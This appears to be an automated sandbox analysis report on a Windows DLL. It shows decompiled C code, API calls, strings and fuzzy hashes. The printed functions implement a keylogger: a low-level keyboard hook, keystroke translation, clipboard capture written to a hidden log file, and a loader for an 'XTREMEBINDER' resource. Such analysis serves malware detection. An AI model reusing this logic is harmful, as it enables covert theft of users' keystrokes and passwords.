0x00000000
0x10007662
0x10007664
0x10007669
0x00000000
0x00000000
0x10007670
0x10007672
0x10007677
0x00000000
0x00000000
0x1000767e
0x10007680
0x10007685
0x00000000
0x00000000
0x1000768c
0x1000768e
0x10007693
0x00000000
0x00000000
0x1000769a
0x1000769c
0x100076a1
0x00000000
0x00000000
0x100076a8
0x100076aa
0x100076af
0x00000000
0x00000000
0x100076b6
0x100076b8
0x100076bd
0x00000000
0x00000000
0x100076c4
0x100076c6
0x100076cb
0x00000000
0x00000000
0x100076d2
0x100076d4
0x100076d9
0x00000000
0x00000000
0x100076e0
0x100076e2
0x100076e7
0x00000000
0x00000000
0x10006ed5
0x100076ec
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 10003770: SysFreeString.OLEAUT32(1000CFDC), ref: 1000377E

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$FreeString
String ID: KeyDelBackspace$Numpad
API String ID: 610577094-3409537306
Opcode ID: ed6114367509c6d9fab90cc7175f2c84ae42d38466c56a82ea0a6d039912394e
Instruction ID: 239179f37c3e83d944ae5989e00453cfc3f7d2dfafefd2690d13731161f6058c
Opcode Fuzzy Hash: ed6114367509c6d9fab90cc7175f2c84ae42d38466c56a82ea0a6d039912394e
Instruction Fuzzy Hash: 9451E9B9E002545BF721CB24CC41B9F73A9FB887C0F5081A5FA489724ADA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100030CC, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E100030CC(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x1000f038 == 0) {
					if( *0x1000e020 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x1000f20c == 0xd7b2 &&  *0x1000f214 > 0) {
						 *0x1000f224();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E10003154, 2,  &_v4, 0);
				}
			}

0x100030d4
0x10003134
0x10003144
0x10003144
0x1000314a
0x100030d6
0x100030df
0x100030ef
0x100030ef
0x1000310b
0x1000312c
0x1000312c

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,1000319A,?,?,?,00000002,1000323A,1000259B,100025E3,00000002,00000000), ref: 10003105
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,1000319A,?,?,?,00000002,1000323A,1000259B,100025E3,00000002), ref: 1000310B
GetStdHandle.KERNEL32(000000F5,10003154,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,1000319A,?,?), ref: 10003120
WriteFile.KERNEL32(00000000,000000F5,10003154,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,1000319A,?,?), ref: 10003126
MessageBoxA.USER32 ref: 10003144

Strings

Runtime error at 00000000, xrefs: 100030FE, 1000313D
Error, xrefs: 10003138

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: 34c1e474a0937ca068d19135c8955f1baf6dec87746d38fd93c81dd1fbdfdeba
Instruction ID: d75082f90510a20ccce61780b3b63c21f75a1319e25b57c37db6013eec112d5f
Opcode Fuzzy Hash: 34c1e474a0937ca068d19135c8955f1baf6dec87746d38fd93c81dd1fbdfdeba
Instruction Fuzzy Hash: F8F0B4BA9443D078F621E3608C86FEB239CC745BD0F108208F364648DFCBE468C4A626

Uniqueness

Uniqueness Score: -1.00%

Function 10008560, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E10008560(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, void* _a16) {
				intOrPtr _v8;
				void* _v12;
				char _v16;
				long _v24;
				long _v28;
				long _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v300;
				intOrPtr _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v328;
				char _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				char _v360;
				char _v364;
				char _v368;
				char _v372;
				char _v376;
				char _v380;
				char _v384;
				intOrPtr* _t101;
				intOrPtr _t102;
				intOrPtr _t103;
				void* _t111;
				void* _t113;
				void* _t123;
				intOrPtr _t135;
				long _t151;
				void* _t153;
				intOrPtr _t155;
				struct HHOOK__* _t160;
				struct HHOOK__* _t163;
				long _t193;
				void* _t196;
				void* _t198;
				long _t199;
				void* _t207;
				void* _t209;
				struct HHOOK__* _t211;
				intOrPtr _t230;
				void* _t246;
				void* _t249;
				intOrPtr _t258;
				void* _t267;
				void* _t268;
				void* _t269;
				void* _t270;
				intOrPtr _t273;
				intOrPtr _t284;
				intOrPtr _t291;
				intOrPtr _t303;
				intOrPtr _t304;
				intOrPtr _t305;
				void* _t330;
				intOrPtr _t332;
				intOrPtr _t333;
				void* _t337;

				_t329 = __esi;
				_t328 = __edi;
				_t101 = __eax +  *__eax;
				 *_t101 =  *_t101 + _t101;
				 *_t101 =  *_t101 + _t101;
				_t332 = _t333;
				_t270 = 0x2f;
				do {
					_push(0);
					_push(0);
					_t270 = _t270 - 1;
				} while (_t270 != 0);
				_push(_t270);
				_push(__ebx);
				_push(__esi);
				_t267 = _a16;
				_t102 = _a8;
				_push(_t332);
				_push(0x10008ba5);
				_push( *[fs:edx]);
				 *[fs:edx] = _t333;
				_t337 = _t102 -  *0x1000f68c; // 0xc1b9
				if(_t337 != 0) {
					__eflags = _t102 -  *0x1000f690; // 0xc1ba
					if(__eflags != 0) {
						__eflags = _t102 -  *0x1000f694; // 0xc1bc
						if(__eflags != 0) {
							__eflags = _t102 -  *0x1000f698; // 0x0
							if(__eflags != 0) {
								__eflags = _t102 -  *0x1000f69c; // 0xc1bd
								if(__eflags != 0) {
									__eflags = _t102 - 0x308;
									if(_t102 != 0x308) {
										__eflags = _t102 -  *0x1000f6a0; // 0xc1be
										if(__eflags != 0) {
											_push(_t267);
											_push(_a12);
											_push(_t102);
											_t103 = _a4;
											_push(_t103);
											L10004FE0();
											_v8 = _t103;
										} else {
											__eflags =  *0x1000e0b8;
											if( *0x1000e0b8 != 0) {
												_t111 =  *0x1000e0b8; // 0x0
												SetFilePointer(_t111, 0, 0, 0);
												_t113 =  *0x1000e0b8; // 0x0
												SetEndOfFile(_t113);
												 *0x1000f6c4 = 0;
												 *0x1000f6c8 = 0;
												__eflags =  *0x1000f6c1 - 1;
												if(__eflags == 0) {
													E10006710( &_v380, _t270, 0,  *0x1000f6c4,  *0x1000f6c8);
													_t273 =  *0x1000f6b4; // 0x0
													E10003988( &_v384, _t273, L"SOFTWARE\\", __eflags);
													E1000577C(0x80000001, _t267, L"LastSize", _v384, __esi, __eflags, 2, _v380);
												}
											}
										}
									} else {
										__eflags =  *0x1000f6d4;
										if( *0x1000f6d4 != 0) {
											_t123 = E100069DC(0, _t267,  &_v12, __esi);
											__eflags = _t123 - 1;
											if(_t123 == 1) {
												_t291 =  *0x1000e0b4; // 0x0
												E10003A34(_v12, _t291);
												if(__eflags != 0) {
													E100037AC(0x1000e0b4, _v12);
													E10008270(L"\r\n\r\n", _t267,  &_v352, __edi, __esi);
													_push(_v352);
													_push(L"<FONT COLOR=\"red\">[Clipboard");
													_push(L" --- ");
													E10006B14(0x2f, _t267, 0x3a, 0x20, __edi, _t329,  &_v356);
													_push(_v356);
													_push(L"]</font>");
													E10008270(0x10008bcc, _t267,  &_v360, __edi, _t329);
													_push(_v360);
													_t135 =  *0x1000e0b4; // 0x0
													E10008270(_t135, _t267,  &_v364, _t328, _t329);
													_push(_v364);
													E10008270(0x10008bcc, _t267,  &_v368, _t328, _t329);
													_push(_v368);
													_push(L"<FONT COLOR=\"red\">[Clipboard End]</font>");
													E10008270(L"\r\n\r\n", _t267,  &_v372, _t328, _t329);
													_push(_v372);
													E100039EC();
													__eflags =  *0x1000e0b8 - 0xffffffff;
													if(__eflags != 0) {
														E100061F8(_v12,  &_v376, __eflags);
														E100037D0( &_v12, _v376);
														_t151 = E1000391C(_v12) + _t150;
														__eflags = _t151;
														_t153 =  *0x1000e0b8; // 0x0
														WriteFile(_t153, _v12, _t151,  &_v32, 0);
													}
													E100037AC(0x1000f6d0, L"qualquercoisarsrsr");
												}
											}
										}
									}
								} else {
									__eflags =  *0x1000f6d4;
									if( *0x1000f6d4 != 0) {
										_t155 =  *0x1000f69c; // 0xc1bd
										_v8 = _t155 + 1;
									}
								}
							} else {
								__eflags =  *0x1000f6d4;
								if( *0x1000f6d4 != 0) {
									_t160 =  *0x1000f6d4; // 0x0
									UnhookWindowsHookEx(_t160);
								}
								 *0x1000f6d4 = SetWindowsHookExW(0xd, E10008040, GetModuleHandleA(0), 0);
							}
						} else {
							__eflags =  *0x1000f6d4;
							if( *0x1000f6d4 != 0) {
								_t163 =  *0x1000f6d4; // 0x0
								UnhookWindowsHookEx(_t163);
							}
							 *0x1000f6d4 = 0;
						}
					} else {
						E10003770( &_v12);
						__eflags =  *0x1000f6d4;
						if( *0x1000f6d4 != 0) {
							_t211 =  *0x1000f6d4; // 0x0
							UnhookWindowsHookEx(_t211);
						}
						__eflags =  *0x1000e0b8 - 0xffffffff;
						if(__eflags != 0) {
							_t196 =  *0x1000e0b8; // 0x0
							SetFilePointer(_t196, 0, 0, 0);
							_t198 =  *0x1000e0b8; // 0x0
							_t199 = GetFileSize(_t198, 0);
							__eflags = 0;
							_v28 = _t199;
							_v24 = 0;
							E10003BE4( &_v12, E10003FD4(_v28, _v24, 2, 0));
							_t207 =  *0x1000e0b8; // 0x0
							ReadFile(_t207, _v12, _v28,  &_v32, 0);
							_t209 =  *0x1000e0b8; // 0x0
							SetFilePointer(_t209, 0, 0, 2);
						}
						_t303 =  *0x1000f684; // 0x0
						E10003988( &_v336, L"temp", _t303, __eflags);
						SetFileAttributesW(E1000390C(_v336), 0x80);
						_t304 =  *0x1000f684; // 0x0
						E10003988( &_v340, L"temp", _t304, __eflags);
						DeleteFileW(E1000390C(_v340));
						_t305 =  *0x1000f684; // 0x0
						E10003988( &_v344, L"temp", _t305, __eflags);
						_t268 = CreateFileW(E1000390C(_v344), 0x40000000, 0, 0, 2, 0, 0);
						__eflags = _t268 - 0xffffffff;
						if(__eflags != 0) {
							E100061F8(_v12,  &_v348, __eflags);
							E100037D0( &_v12, _v348);
							_t193 = E1000391C(_v12) + _t192;
							__eflags = _t193;
							WriteFile(_t268, _v12, _t193,  &_v32, 0);
						}
						CloseHandle(_t268);
						 *0x1000f6d4 = SetWindowsHookExW(0xd, E10008040, GetModuleHandleA(0), 0);
					}
					L43:
					_pop(_t284);
					 *[fs:eax] = _t284;
					_push(E10008BAC);
					E10003788( &_v384, 0x13);
					E10003788( &_v40, 2);
					return E10003788( &_v16, 2);
				}
				_t330 = _t267;
				E100050D0( &_v308, _t330);
				VirtualFree(_t330, 0, 0x8000);
				E10006E78(_t267, __edi, _t330,  &_v36, _v308, _v304,  &_v300, _v44);
				E100037D0( &_v40, _v36);
				E10006974( &_v16);
				_t269 = E10008438(_v16, _t267, __edi, _t330);
				_t230 =  *0x1000f6d0; // 0x0
				E10003A34(_t230, _v16);
				if(_t337 == 0) {
					L7:
					E10003770( &_v16);
					L8:
					E10003A34(_v40, 0);
					if(0 != 0) {
						_t340 = _t269 - 1;
						if(_t269 == 1) {
							E10008270(_v36, _t269,  &_v328, _t328, _t330);
							E10003988( &_v12, _v328, _v16, _t340);
							_t341 =  *0x1000e0b8 - 0xffffffff;
							if( *0x1000e0b8 != 0xffffffff) {
								E100061F8(_v12,  &_v332, _t341);
								E100037D0( &_v12, _v332);
								_t246 = E1000391C(_v12);
								_t249 =  *0x1000e0b8; // 0x0
								WriteFile(_t249, _v12, _t246 + _t246,  &_v32, 0);
							}
						}
					}
					goto L43;
				}
				E10003A34(_v40, 0);
				if(0 == 0) {
					goto L7;
				} else {
					E100037AC(0x1000f6d0, _v16);
					_push(L"\r\n\r\n");
					_push(_v16);
					_push(0x10008bcc);
					_push(_v36);
					E100039EC();
					E10008270(L"\r\n\r\n", _t269,  &_v312, __edi, _t330);
					_push(_v312);
					_push(L"<FONT COLOR=\"blue\">[");
					_t258 =  *0x1000f6d0; // 0x0
					E10008270(_t258, _t269,  &_v316, _t328, _t330);
					_push(_v316);
					_push(0x10008c08);
					_push(L" --- ");
					E10006B14(0x2f, _t269, 0x3a, 0x20, _t328, _t330,  &_v320);
					_push(_v320);
					_push(L"</font>");
					E10008270(0x10008bcc, _t269,  &_v324, _t328, _t330);
					_push(_v324);
					E100039EC();
					goto L8;
				}
			}

0x10008560
0x10008560
0x10008560
0x10008562
0x10008566
0x10008569
0x1000856b
0x10008570
0x10008570
0x10008572
0x10008574
0x10008574
0x10008577
0x10008578
0x10008579
0x1000857a
0x1000857d
0x10008582
0x10008583
0x10008588
0x1000858b
0x1000858e
0x10008594
0x1000875b
0x10008761
0x100088e3
0x100088e9
0x1000890b
0x10008911
0x10008948
0x1000894e
0x1000896b
0x10008970
0x10008abc
0x10008ac2
0x10008b5b
0x10008b5f
0x10008b60
0x10008b61
0x10008b64
0x10008b65
0x10008b6a
0x10008ac8
0x10008ac8
0x10008acf
0x10008adb
0x10008ae1
0x10008ae6
0x10008aec
0x10008af1
0x10008afb
0x10008b05
0x10008b0c
0x10008b20
0x10008b34
0x10008b3f
0x10008b54
0x10008b54
0x10008b0c
0x10008acf
0x10008976
0x10008976
0x1000897d
0x10008988
0x1000898d
0x1000898f
0x10008998
0x1000899e
0x100089a3
0x100089b1
0x100089c1
0x100089c6
0x100089cc
0x100089d1
0x100089e9
0x100089ee
0x100089f4
0x10008a04
0x10008a09
0x10008a15
0x10008a1a
0x10008a1f
0x10008a30
0x10008a35
0x10008a3b
0x10008a4b
0x10008a50
0x10008a5e
0x10008a63
0x10008a6a
0x10008a75
0x10008a83
0x10008a96
0x10008a96
0x10008a9d
0x10008aa3
0x10008aa3
0x10008ab2
0x10008ab2
0x100089a3
0x1000898f
0x1000897d
0x10008950
0x10008950
0x10008957
0x1000895d
0x10008963
0x10008963
0x10008957
0x10008913
0x10008913
0x1000891a
0x1000891c
0x10008922
0x10008922
0x1000893e
0x1000893e
0x100088eb
0x100088eb
0x100088f2
0x100088f4
0x100088fa
0x100088fa
0x10008901
0x10008901
0x10008767
0x1000876a
0x1000876f
0x10008776
0x10008778
0x1000877e
0x1000877e
0x10008783
0x1000878a
0x10008792
0x10008798
0x1000879f
0x100087a5
0x100087aa
0x100087ac
0x100087af
0x100087c6
0x100087d9
0x100087df
0x100087ea
0x100087f0
0x100087f0
0x10008805
0x1000880b
0x1000881c
0x1000882c
0x10008832
0x10008843
0x10008862
0x10008868
0x1000887e
0x10008880
0x10008883
0x1000888e
0x1000889c
0x100088af
0x100088af
0x100088b7
0x100088b7
0x100088bd
0x100088d9
0x100088d9
0x10008b6d
0x10008b6f
0x10008b72
0x10008b75
0x10008b85
0x10008b92
0x10008ba4
0x10008ba4
0x100085a5
0x100085aa
0x100085b7
0x100085db
0x100085e6
0x100085ee
0x100085fb
0x100085fd
0x10008605
0x1000860a
0x100086cd
0x100086d0
0x100086d5
0x100086da
0x100086df
0x100086e5
0x100086e8
0x100086f7
0x10008708
0x1000870d
0x10008714
0x10008723
0x10008731
0x1000873f
0x1000874b
0x10008751
0x10008751
0x10008714
0x100086e8
0x00000000
0x100086df
0x10008615
0x1000861a
0x00000000
0x10008620
0x10008628
0x1000862d
0x10008632
0x10008635
0x1000863a
0x10008645
0x10008655
0x1000865a
0x10008660
0x1000866b
0x10008670
0x10008675
0x1000867b
0x10008680
0x10008698
0x1000869d
0x100086a3
0x100086b3
0x100086b8
0x100086c6
0x00000000
0x100086c6

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00000000,10008BA5,?,?,?,0000002E,00000000,00000000), ref: 100085B7

Strings

, xrefs: 100086A3
[, xrefs: 10008660
--- , xrefs: 10008680
, xrefs: 1000862D, 10008650

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: FreeVirtual
String ID: $ --- $$[
API String ID: 1263568516-341333612
Opcode ID: 844369069b05dfd62b440b7fafa7b9f06d8a9886853feb290a734d0b2ba6acd8
Instruction ID: 82ed3cb906cd8235e36a84cac39b9343783464e2b4201940a396f7c820685ddb
Opcode Fuzzy Hash: 844369069b05dfd62b440b7fafa7b9f06d8a9886853feb290a734d0b2ba6acd8
Instruction Fuzzy Hash: 6F513A78A00119AFEB11DB94CC81FDEB7B9FB48380F5084A1F548A7269DB31BF458B61

Uniqueness

Uniqueness Score: -1.00%

Function 1000B700, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000B700(intOrPtr* __eax) {
				struct HINSTANCE__* _t4;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__* _t8;
				void* _t10;
				struct HRSRC__* _t17;
				void* _t18;
				intOrPtr* _t23;
				unsigned int _t25;

				_t23 = __eax;
				E10003770(__eax);
				_t4 =  *0x1000f654; // 0x10000000
				_t17 = FindResourceW(_t4, L"XTREMEBINDER", 0xa);
				_t6 =  *0x1000f654; // 0x10000000
				_t25 = SizeofResource(_t6, _t17);
				_t8 =  *0x1000f654; // 0x10000000
				_t18 = LoadResource(_t8, _t17);
				_t10 = LockResource(_t18);
				_t24 = _t10;
				if(_t10 != 0) {
					E10003BE4(_t23, _t25 >> 1);
					E100050D0(E1000390C( *_t23), _t24);
					return FreeResource(_t18);
				}
				return _t10;
			}

0x1000b704
0x1000b708
0x1000b714
0x1000b71f
0x1000b722
0x1000b72d
0x1000b730
0x1000b73b
0x1000b73e
0x1000b743
0x1000b747
0x1000b74f
0x1000b75f
0x00000000
0x1000b765
0x1000b76e

APIs

Part of subcall function 10003770: SysFreeString.OLEAUT32(1000CFDC), ref: 1000377E

FindResourceW.KERNEL32(10000000,XTREMEBINDER,0000000A,?,?,1000F834,?,1000B7CA,00000000,1000BC5D,?,1000F834,00000000,00000000,000002C4,00000000), ref: 1000B71A
SizeofResource.KERNEL32(10000000,00000000,10000000,XTREMEBINDER,0000000A,?,?,1000F834,?,1000B7CA,00000000,1000BC5D,?,1000F834,00000000,00000000), ref: 1000B728
LoadResource.KERNEL32(10000000,00000000,10000000,00000000,10000000,XTREMEBINDER,0000000A,?,?,1000F834,?,1000B7CA,00000000,1000BC5D,?,1000F834), ref: 1000B736
LockResource.KERNEL32(00000000,10000000,00000000,10000000,00000000,10000000,XTREMEBINDER,0000000A,?,?,1000F834,?,1000B7CA,00000000,1000BC5D), ref: 1000B73E
FreeResource.KERNEL32(00000000,00000000,10000000,00000000,10000000,00000000,10000000,XTREMEBINDER,0000000A,?,?,1000F834,?,1000B7CA,00000000,1000BC5D), ref: 1000B765

Strings

XTREMEBINDER, xrefs: 1000B70F

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Resource$Free$FindLoadLockSizeofString
String ID: XTREMEBINDER
API String ID: 1314290513-399165745
Opcode ID: 17ceae75176a0c04b03f872206b008580ef93f74fcc784d7bab5c6ea897d36e1
Instruction ID: 56a9b21ec2ef0885f1dba9b5c05c5a0442ce31da9cf93dba5427497db9e4b129
Opcode Fuzzy Hash: 17ceae75176a0c04b03f872206b008580ef93f74fcc784d7bab5c6ea897d36e1
Instruction Fuzzy Hash: A2F09AAA700A542BB111E7BD8CC1D3F738DEB84AC0B420020F608DB21ECE29FC0543A8

Uniqueness

Uniqueness Score: -1.00%

Function 10001904, Relevance: 9.1, APIs: 6, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E10001904() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x1000f5b0 == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push(E100019DA);
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x1000f039 != 0) {
						_push(0x1000f5b8);
						L1000119C();
					}
					 *0x1000f5b0 = 0;
					_t3 =  *0x1000f610; // 0x0
					LocalFree(_t3);
					 *0x1000f610 = 0;
					_t19 =  *0x1000f5d8; // 0x0
					while(_t19 != 0x1000f5d8) {
						VirtualFree( *(_t19 + 8), 0, 0x8000);
						_t19 =  *_t19;
					}
					E10001204(0x1000f5d8);
					E10001204(0x1000f5e8);
					E10001204(0x1000f614);
					_t14 =  *0x1000f5d0; // 0x0
					while(_t14 != 0) {
						 *0x1000f5d0 =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x1000f5d0; // 0x0
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x100019e1);
					if( *0x1000f039 != 0) {
						_push(0x1000f5b8);
						L100011A4();
					}
					_push(0x1000f5b8);
					L100011AC();
					return 0;
				}
			}

0x10001905
0x1000190f
0x100019e3
0x10001915
0x10001917
0x10001918
0x1000191d
0x10001920
0x1000192a
0x1000192c
0x10001931
0x10001931
0x10001936
0x1000193d
0x10001943
0x1000194a
0x1000194f
0x10001969
0x10001962
0x10001967
0x10001967
0x10001976
0x10001980
0x1000198a
0x1000198f
0x10001996
0x1000199a
0x100019a1
0x100019a6
0x100019ab
0x100019b1
0x100019b4
0x100019b7
0x100019c3
0x100019c5
0x100019ca
0x100019ca
0x100019cf
0x100019d4
0x100019d9
0x100019d9

APIs

RtlEnterCriticalSection.KERNEL32(1000F5B8,00000000,100019DA), ref: 10001931
LocalFree.KERNEL32(00000000,00000000,100019DA), ref: 10001943
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000000,100019DA), ref: 10001962
LocalFree.KERNEL32(00000000,?,00000000,00008000,00000000,00000000,100019DA), ref: 100019A1
RtlLeaveCriticalSection.KERNEL32(1000F5B8,100019E1,00000000,00000000,100019DA), ref: 100019CA
RtlDeleteCriticalSection.KERNEL32(1000F5B8,100019E1,00000000,00000000,100019DA), ref: 100019D4

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID:
API String ID: 3782394904-0
Opcode ID: 1380d907013bf04497dbd19d8993ee2cfe80bf7fddd9bf3f1e6acc5245a36259
Instruction ID: c7235647f75663e059265485ffa3ed86b09466631e02243638bb2540abc76f59
Opcode Fuzzy Hash: 1380d907013bf04497dbd19d8993ee2cfe80bf7fddd9bf3f1e6acc5245a36259
Instruction Fuzzy Hash: 591182B9604A906EF715DF648CA1BF53799E7452C6F80405CF340879AEDB25A840E761

Uniqueness

Uniqueness Score: -1.00%

Function 100070F0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100070F0(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Numpad /]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x100070f0
0x100070f0
0x1000716e
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
